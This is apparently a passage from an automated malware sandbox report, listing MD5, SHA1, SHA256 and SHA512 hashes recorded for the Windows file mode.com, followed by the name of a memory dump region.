SHA256 6b84f61aa1555bbb042679d6086ecc306e9f0c82210c50013742e09d50c09cba
SHA512 01cd538987de6109ac3d3cdf91411af4cc13e029dda843f4df51e5e9e7a09a92570e0b19237839799ecce28968e031dd2e077d479aa394646e3e292138a07b34

C:\Windows\System32\mode.com

MD5 a7aa614fbab06e2a6db9554139e2175b
SHA1 58e878a6a718d761b46187e0f52b4855d4be5a5f
SHA256 865831bae35944155c6707a65d75ecca2ac7f7d712c9566e032ab23c2b02d066
SHA512 6ccf0f727bcfd876ad83698420f75a4d27b2e02ec7fb2e678d97a128503cb1c5b616694ba9193bbf4af3f107fcb6ed1845375d78c83b6e064b24c3be16c74049

C:\Windows\System32\mode.com

MD5 fc535f0f19ef86f79c16ea39fff476d2
SHA1 a74ebc96290d75d07d56bfa692c0f499aecc5dbd
SHA256 10f641974f22e9f6e9eef4f9c3b8cf69b2267a1b7db61d49a8f7688e6c7673b6
SHA512 e0ef22800bd572e7c111df347e85ef0ab9ed063ddc9a33d99fdbae9ab486b3178d9af16ab2857d1c0f09042713043534f9ddb95e678170d915230d573500ce8c

memory/5108-14136-0x00007FFB52730000-0x00007FFB531F1000-memory.dmp